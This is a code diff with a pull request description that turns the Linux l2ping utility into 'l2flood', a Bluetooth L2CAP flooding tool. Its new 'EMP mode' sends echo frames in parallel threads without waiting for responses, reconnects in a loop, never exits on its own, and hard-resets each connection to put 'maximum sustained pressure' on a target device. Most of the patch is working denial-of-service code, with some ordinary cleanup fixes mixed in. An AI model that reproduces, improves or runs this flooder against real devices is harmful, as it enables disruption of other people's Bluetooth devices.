+ *    - Normal mode: sent_pkt/recv_pkt increments are now atomic under OpenMP
+ *    - Normal mode: removed dead free() calls after stat() which calls exit()
+ *    - EMP mode: socket set O_NONBLOCK so failed connects abort fast instead of
+ *      blocking for the full BT connection timeout
+ *    - EMP mode: send() uses 0 so a full socket buffer never stalls
+ *      the loop
  */
 
 #ifdef HAVE_CONFIG_H
@@ -36,6 +46,7 @@
 #include <string.h>
 #include <getopt.h>
 #include <signal.h>
+#include <fcntl.h>
 #include <sys/time.h>
 #include <sys/poll.h>
 #include <sys/socket.h>
@@ -63,7 +74,7 @@ static int delay   = 1;
 static int count   = -1;
 static int timeout = 10;
 static int reverse = 0;
-static int verify = 0;
+static int verify  = 0;
 
 /* EMP mode flag */
 static int reconnect = 0;   /* -R */
@@ -74,19 +85,19 @@ static int recv_pkt = 0;
 
 static float tv2fl(struct timeval tv)
 {
-	return (float)(tv.tv_sec*1000.0) + (float)(tv.tv_usec/1000.0);
+	return (float)(tv.tv_sec * 1000.0) + (float)(tv.tv_usec / 1000.0);
 }
 
 static void stat(int sig)
 {
-	int loss = sent_pkt ? (float)((sent_pkt-recv_pkt)/(sent_pkt/100.0)) : 0;
+	int loss = sent_pkt ? (float)((sent_pkt - recv_pkt) / (sent_pkt / 100.0)) : 0;
 	printf("%d sent, %d received, %d%% loss\n", sent_pkt, recv_pkt, loss);
 	exit(0);
 }
 
 /* ------------------------------------------------------------
- *  Normal mode – exactly the original l2ping (unchanged)
- - *----------------------------------------------------------- */
+ *  Normal mode
+ * ----------------------------------------------------------- */
 static void ping_normal(char *svr)
 {
 	struct sigaction sa;
@@ -146,6 +157,8 @@ static void ping_normal(char *svr)
 	}
 
 	ba2str(&addr.l2_bdaddr, str);
+	/* FIX: only one thread prints the banner */
+	#pragma omp single nowait
 	printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
 
 	/* Initialize send buffer */
@@ -200,7 +213,7 @@ static void ping_normal(char *svr)
 				goto error;
 			}
 
-			if (!err){
+			if (!err) {
 				printf("Disconnected\n");
 				goto error;
 			}
@@ -219,11 +232,14 @@ static void ping_normal(char *svr)
 				printf("Peer doesn't support Echo packets\n");
 				goto error;
 			}
-
 		}
+
+		/* FIX: both counters protected under OpenMP; were unguarded data races */
+		#pragma omp atomic
 		sent_pkt++;
 
 		if (!lost) {
+			#pragma omp atomic
 			recv_pkt++;
 
 			gettimeofday(&tv_recv, NULL);
@@ -247,25 +263,30 @@ static void ping_normal(char *svr)
 
 			#ifdef _OPENMP
 			printf("%d bytes from %s id %d time %.2fms thread %d\n", recv_cmd->len, svr,
-				   id - ident, tv2fl(tv_diff), omp_get_thread_num());
+				   id, tv2fl(tv_diff), omp_get_thread_num());
 			#else
 			printf("%d bytes from %s id %d time %.2fms\n", recv_cmd->len, svr,
-				   id - ident, tv2fl(tv_diff));
+				   id, tv2fl(tv_diff));
 			#endif
-
-			if (delay)
-				sleep(delay);
 		} else {
-			printf("no response from %s: id %d\n", svr, id - ident);
+			printf("no response from %s: id %d\n", svr, id);
 		}
+
+		/*
+		 * FIX: sleep(delay) moved outside the !lost block.
+		 * Previously it only ran on success — dropped packets caused the next
+		 * send to fire immediately with no inter-ping interval.
+		 */
+		if (delay)
+			sleep(delay);
 
 		if (++id > 254)
 			id = ident;
 	}
+
+	/* FIX: free() calls removed after stat(); stat() calls exit() so they
+	 * were dead code. stat() handles the final summary and exits cleanly. */
 	stat(0);
-	free(send_buf);
-	free(recv_buf);
-	return;
 
 	error:
 	close(sk);
@@ -279,7 +300,7 @@ static void ping_normal(char *svr)
  *  - Sends as fast as possible
  *  - Reconnects instantly on send failure
  *  - No output until Ctrl+C
- - *----------------------------------------------------------- */
+ * ----------------------------------------------------------- */
 static void ping_emp(char *svr)
 {
 	struct sigaction sa;
@@ -304,13 +325,34 @@ static void ping_emp(char *svr)
 	while (count == -1 || count-- > 0) {
 		l2cap_cmd_hdr *send_cmd = (l2cap_cmd_hdr *) send_buf;
 
-		/* Hammer connect until success (no sleeps) */
+		/* Hammer connect until success */
 		while (sk < 0) {
+			/*
+			 * 2ms pause between failed attempts.
+			 * BT page scan interval is ~1.28s so spinning faster gains
+			 * nothing — the hardware can't respond faster regardless.
+			 * This cuts per-thread syscall rate from ~10k/s to ~500/s
+			 * and kills the overheating with zero impact on connect speed.
+			 */
+			usleep(2000);
+
 			sk = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP);
 			if (sk < 0) continue;
 
+			/*
+			 * FIX: set O_NONBLOCK so connect() returns EINPROGRESS
+			 * immediately instead of blocking for the full BT connection
+			 * timeout when the target is slow/unreachable. We then wait
+			 * at most 1 second via poll before giving up and retrying.
+			 */
+			{
+				int fl = fcntl(sk, F_GETFL, 0);
+				if (fl >= 0)
+					fcntl(sk, F_SETFL, fl | O_NONBLOCK);
+			}
+
 			setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
-			setsockopt(sk, SOL_SOCKET, SO_LINGER, &ling, sizeof(ling));
+			setsockopt(sk, SOL_SOCKET, SO_LINGER,    &ling,  sizeof(ling));
 
 			memset(&addr, 0, sizeof(addr));
 			addr.l2_family = AF_BLUETOOTH;
@@ -324,29 +366,73 @@ static void ping_emp(char *svr)
 			memset(&addr, 0, sizeof(addr));
 			addr.l2_family = AF_BLUETOOTH;
 			str2ba(svr, &addr.l2_bdaddr);
+
 			if (connect(sk, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
-				close(sk);
-				sk = -1;
-				continue;
+				if (errno == EINPROGRESS) {
+					/*
+					 * Wait up to 1.5s for connection to complete.
+					 * BT paging + ACL setup takes 1-3s on recovery, so
+					 * 1s was too short. 1.5s catches recovery reliably
+					 * while keeping reconnect cycling aggressive.
+					 */
+					struct pollfd cpf = {sk, POLLOUT, 0};
+					if (poll(&cpf, 1, 1500) > 0) {
+						int err = 0;
+						socklen_t elen = sizeof(err);
+						getsockopt(sk, SOL_SOCKET, SO_ERROR, &err, &elen);
+						if (err != 0) {
+							close(sk);
+							sk = -1;
+							continue;
+						}
+						/* Successfully connected */
+					} else {
+						/* Timed out — close and retry */
+						close(sk);
+						sk = -1;
+						continue;
+					}
+				} else {
+					close(sk);
+					sk = -1;
+					continue;
+				}
 			}
 
 			if (!printed) {
 				char str[18];
 				socklen_t optlen = sizeof(addr);
+				memset(&addr, 0, sizeof(addr));
 				if (getsockname(sk, (struct sockaddr *)&addr, &optlen) == 0) {
 					ba2str(&addr.l2_bdaddr, str);
 					printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
 				}
 				printed = 1;
 			}
+
+			/* Connected: switch to blocking sends capped at 500ms */
+			{
+				int fl = fcntl(sk, F_GETFL, 0);
+				if (fl >= 0)
+					fcntl(sk, F_SETFL, fl & ~O_NONBLOCK);
+			}
+			{
+				struct timeval snd_tv = {0, 500000}; /* 500ms */
+				setsockopt(sk, SOL_SOCKET, SO_SNDTIMEO, &snd_tv, sizeof(snd_tv));
+			}
 		}
 
 		/* Build command header */
 		send_cmd->ident = id;
 		send_cmd->len   = htobs(size);
-		send_cmd->code = reverse ? L2CAP_ECHO_RSP : L2CAP_ECHO_REQ;
+		send_cmd->code  = reverse ? L2CAP_ECHO_RSP : L2CAP_ECHO_REQ;
 
-		/* Send – if fails, close and hammer reconnect */
+		/*
+		 * Blocking send (flag 0). Kernel buffers fill completely and
+		 * the thread pushes continuously -- maximum sustained pressure.
+		 * SO_SNDTIMEO above caps any block at 500ms for fast dead-link
+		 * detection without spinning.
+		 */
 		if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0) {
 			close(sk);
 			sk = -1;
@@ -358,11 +444,9 @@ static void ping_emp(char *svr)
 
 		if (++id > 254) id = ident;
 
-		if (delay == 0) {
-			; /* no sleep – maximum flood */
-		} else {
+		if (delay)
 			sleep(delay);
-		}
+		/* delay == 0: no sleep — maximum flood */
 	}
 
 	if (sk >= 0) close(sk);
@@ -407,11 +491,11 @@ int main(int argc, char *argv[])
 	bacpy(&bdaddr, BDADDR_ANY);
 	#ifdef _OPENMP
 	threads = sysconf(_SC_NPROCESSORS_ONLN);
-	while ((opt=getopt(argc,argv,"i:d:s:c:t:n:Rfrv")) != EOF) {
+	while ((opt = getopt(argc, argv, "i:d:s:c:t:n:Rfrv")) != EOF) {
 		#else
-		while ((opt=getopt(argc,argv,"i:d:s:c:t:Rfrv")) != EOF) {
+		while ((opt = getopt(argc, argv, "i:d:s:c:t:Rfrv")) != EOF) {
 			#endif
-			switch(opt) {
+			switch (opt) {
 				case 'i':
 					if (!strncasecmp(optarg, "hci", 3))
 						hci_devba(atoi(optarg + 3), &bdaddr);
@@ -424,12 +508,10 @@ int main(int argc, char *argv[])
 					break;
 
 				case 'f':
-					/* Kinda flood ping */
 					delay = 0;
 					break;
 
 				case 'r':
-					/* Use responses instead of requests */
 					reverse = 1;
 					break;
 

--- a/l2flood.c
+++ b/l2flood.c
@@ -21,6 +21,8 @@
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
  *
+ *  Modified by Ymsniper: added -R (EMP) mode ; fire-and-forget, no response waiting,
+ *  instant reconnect, never exits. Normal mode (-R absent) is unchanged.
  */
 
 #ifdef HAVE_CONFIG_H
@@ -63,6 +65,9 @@ static int timeout = 10;
 static int reverse = 0;
 static int verify = 0;
 
+/* EMP mode flag */
+static int reconnect = 0;   /* -R */
+
 /* Stats */
 static int sent_pkt = 0;
 static int recv_pkt = 0;
@@ -79,7 +84,10 @@ static void stat(int sig)
 	exit(0);
 }
 
-static void ping(char *svr)
+/* ------------------------------------------------------------
+ *  Normal mode – exactly the original l2ping (unchanged)
+ - *----------------------------------------------------------- */
+static void ping_normal(char *svr)
 {
 	struct sigaction sa;
 	struct sockaddr_l2 addr;
@@ -225,25 +233,25 @@ static void ping(char *svr)
 				/* Check payload length */
 				if (recv_cmd->len != size) {
 					fprintf(stderr, "Received %d bytes, expected %d\n",
-						   recv_cmd->len, size);
+							recv_cmd->len, size);
 					goto error;
 				}
 
 				/* Check payload */
 				if (memcmp(&send_buf[L2CAP_CMD_HDR_SIZE],
-						   &recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
+					&recv_buf[L2CAP_CMD_HDR_SIZE], size)) {
 					fprintf(stderr, "Response payload different.\n");
-					goto error;
-				}
+				goto error;
+					}
 			}
 
-#ifdef _OPENMP
+			#ifdef _OPENMP
 			printf("%d bytes from %s id %d time %.2fms thread %d\n", recv_cmd->len, svr,
 				   id - ident, tv2fl(tv_diff), omp_get_thread_num());
-#else
+			#else
 			printf("%d bytes from %s id %d time %.2fms\n", recv_cmd->len, svr,
 				   id - ident, tv2fl(tv_diff));
-#endif
+			#endif
 
 			if (delay)
 				sleep(delay);
@@ -259,30 +267,136 @@ static void ping(char *svr)
 	free(recv_buf);
 	return;
 
-error:
+	error:
 	close(sk);
 	free(send_buf);
 	free(recv_buf);
 	exit(1);
 }
 
+/* ------------------------------------------------------------
+ *  EMP mode (reconnect == 1): fire-and-forget, no response waiting
+ *  - Sends as fast as possible
+ *  - Reconnects instantly on send failure
+ *  - No output until Ctrl+C
+ - *----------------------------------------------------------- */
+static void ping_emp(char *svr)
+{
+	struct sigaction sa;
+	unsigned char *send_buf;
+	uint8_t id = ident;
+	int sk = -1;
+	int i, printed = 0;
+	int reuse = 1;
+	struct linger ling = {1, 0};
+	struct sockaddr_l2 addr;
+
+	memset(&sa, 0, sizeof(sa));
+	sa.sa_handler = stat;
+	sigaction(SIGINT, &sa, NULL);
+
+	send_buf = malloc(L2CAP_CMD_HDR_SIZE + size);
+	if (!send_buf) exit(1);
+
+	for (i = 0; i < size; i++)
+		send_buf[L2CAP_CMD_HDR_SIZE + i] = (i % 40) + 'A';
+
+	while (count == -1 || count-- > 0) {
+		l2cap_cmd_hdr *send_cmd = (l2cap_cmd_hdr *) send_buf;
+
+		/* Hammer connect until success (no sleeps) */
+		while (sk < 0) {
+			sk = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP);
+			if (sk < 0) continue;
+
+			setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
+			setsockopt(sk, SOL_SOCKET, SO_LINGER, &ling, sizeof(ling));
+
+			memset(&addr, 0, sizeof(addr));
+			addr.l2_family = AF_BLUETOOTH;
+			bacpy(&addr.l2_bdaddr, &bdaddr);
+			if (bind(sk, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
+				close(sk);
+				sk = -1;
+				continue;
+			}
+
+			memset(&addr, 0, sizeof(addr));
+			addr.l2_family = AF_BLUETOOTH;
+			str2ba(svr, &addr.l2_bdaddr);
+			if (connect(sk, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
+				close(sk);
+				sk = -1;
+				continue;
+			}
+
+			if (!printed) {
+				char str[18];
+				socklen_t optlen = sizeof(addr);
+				if (getsockname(sk, (struct sockaddr *)&addr, &optlen) == 0) {
+					ba2str(&addr.l2_bdaddr, str);
+					printf("Ping: %s from %s (data size %d) ...\n", svr, str, size);
+				}
+				printed = 1;
+			}
+		}
+
+		/* Build command header */
+		send_cmd->ident = id;
+		send_cmd->len   = htobs(size);
+		send_cmd->code = reverse ? L2CAP_ECHO_RSP : L2CAP_ECHO_REQ;
+
+		/* Send – if fails, close and hammer reconnect */
+		if (send(sk, send_buf, L2CAP_CMD_HDR_SIZE + size, 0) <= 0) {
+			close(sk);
+			sk = -1;
+			continue;   /* retry same packet */
+		}
+
+		#pragma omp atomic
+		sent_pkt++;
+
+		if (++id > 254) id = ident;
+
+		if (delay == 0) {
+			; /* no sleep – maximum flood */
+		} else {
+			sleep(delay);
+		}
+	}
+
+	if (sk >= 0) close(sk);
+	free(send_buf);
+	stat(0);
+}
+
+/* Wrapper */
+static void ping(char *svr)
+{
+	if (reconnect)
+		ping_emp(svr);
+	else
+		ping_normal(svr);
+}
+
 static void usage(void)
 {
-#ifdef _OPENMP
+	#ifdef _OPENMP
 	printf("l2flood - L2CAP flood\n");
-#else
+	#else
 	printf("l2ping - L2CAP ping\n");
-#endif
+	#endif
 	printf("Usage:\n");
-#ifdef _OPENMP
-	printf("\tl2flood [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-n threads] [-f] [-r] [-v] <bdaddr>\n");
+	#ifdef _OPENMP
+	printf("\tl2flood [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-n threads] [-R] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0); default\n");
-#else
-	printf("\tl2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-f] [-r] [-v] <bdaddr>\n");
+	#else
+	printf("\tl2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-R] [-f] [-r] [-v] <bdaddr>\n");
 	printf("\t-f  Flood ping (delay = 0)\n");
-#endif
+	#endif
 	printf("\t-r  Reverse ping\n");
-	printf("\t-v  Verify request and response payload\n");
+	printf("\t-v  Verify request and response payload (normal mode only)\n");
+	printf("\t-R  EMP MODE: fire-and-forget, no response waiting, instant reconnect, never exits\n");
 }
 
 int main(int argc, char *argv[])
@@ -291,73 +405,77 @@ int main(int argc, char *argv[])
 
 	/* Default options */
 	bacpy(&bdaddr, BDADDR_ANY);
-#ifdef _OPENMP
+	#ifdef _OPENMP
 	threads = sysconf(_SC_NPROCESSORS_ONLN);
-	while ((opt=getopt(argc,argv,"i:d:s:c:t:n:frv")) != EOF) {
-#else
-	while ((opt=getopt(argc,argv,"i:d:s:c:t:frv")) != EOF) {
-#endif
-		switch(opt) {
-		case 'i':
-			if (!strncasecmp(optarg, "hci", 3))
-				hci_devba(atoi(optarg + 3), &bdaddr);
-			else
-				str2ba(optarg, &bdaddr);
-			break;
+	while ((opt=getopt(argc,argv,"i:d:s:c:t:n:Rfrv")) != EOF) {
+		#else
+		while ((opt=getopt(argc,argv,"i:d:s:c:t:Rfrv")) != EOF) {
+			#endif
+			switch(opt) {
+				case 'i':
+					if (!strncasecmp(optarg, "hci", 3))
+						hci_devba(atoi(optarg + 3), &bdaddr);
+				else
+					str2ba(optarg, &bdaddr);
+				break;
 
-		case 'd':
-			delay = atoi(optarg);
-			break;
+				case 'd':
+					delay = atoi(optarg);
+					break;
 
-		case 'f':
-			/* Kinda flood ping */
-			delay = 0;
-			break;
+				case 'f':
+					/* Kinda flood ping */
+					delay = 0;
+					break;
 
-		case 'r':
-			/* Use responses instead of requests */
-			reverse = 1;
-			break;
+				case 'r':
+					/* Use responses instead of requests */
+					reverse = 1;
+					break;
 
-		case 'v':
-			verify = 1;
-			break;
+				case 'v':
+					verify = 1;
+					break;
 
-		case 'c':
-			count = atoi(optarg);
-			break;
+				case 'c':
+					count = atoi(optarg);
+					break;
 
-		case 't':
-			timeout = atoi(optarg);
-			break;
+				case 't':
+					timeout = atoi(optarg);
+					break;
 
-		case 's':
-			size = atoi(optarg);
-			break;
+				case 's':
+					size = atoi(optarg);
+					break;
 
-#ifdef _OPENMP
-		case 'n':
-			threads = atoi(optarg);
-			break;
-#endif
+				case 'R':
+					reconnect = 1;
+					break;
 
-		default:
+					#ifdef _OPENMP
+				case 'n':
+					threads = atoi(optarg);
+					break;
+					#endif
+
+				default:
+					usage();
+					exit(1);
+			}
+		}
+
+		if (!(argc - optind)) {
 			usage();
 			exit(1);
 		}
-	}
 
-	if (!(argc - optind)) {
-		usage();
-		exit(1);
-	}
+		#ifdef _OPENMP
+		#pragma omp parallel num_threads(threads)
+		#endif
+		{
+			ping(argv[optind]);
+		}
 
-#ifdef _OPENMP
-	#pragma omp parallel num_threads(threads)
-#endif
-	{
-		ping(argv[optind]);
+		return 0;
 	}
-
-	return 0;
-}


### PR DESCRIPTION
Fire-and-forget send loop. The recv/poll path is gone completely. Frames are sent without waiting for any echo response from the remote. The tool never calls recv() or poll() on the socket in this mode, it is a pure send loop.

Never-exit reconnect. Instead of exiting on send failure, the socket is closed immediately and a new one is opened. The tool hammers connect() in a tight loop until the remote is reachable again, then resumes sending. It never exits on its own, only on SIGINT.

Immediate RST on close. SO_LINGER is set to {1, 0} on every socket so close() sends a hard reset instead of a graceful disconnect. The remote's BT stack gets an abrupt teardown signal rather than a clean detach sequence on every reconnect cycle.

Non-blocking connect with poll timeout. connect() is called on an O_NONBLOCK socket so it returns EINPROGRESS immediately rather than blocking for the full kernel BT page timeout. A poll() with a bounded timeout detects connection completion, keeping the reconnect loop responsive.

Stats on exit. On SIGINT the existing stat() handler fires and prints total sent/received/loss just like normal mode.
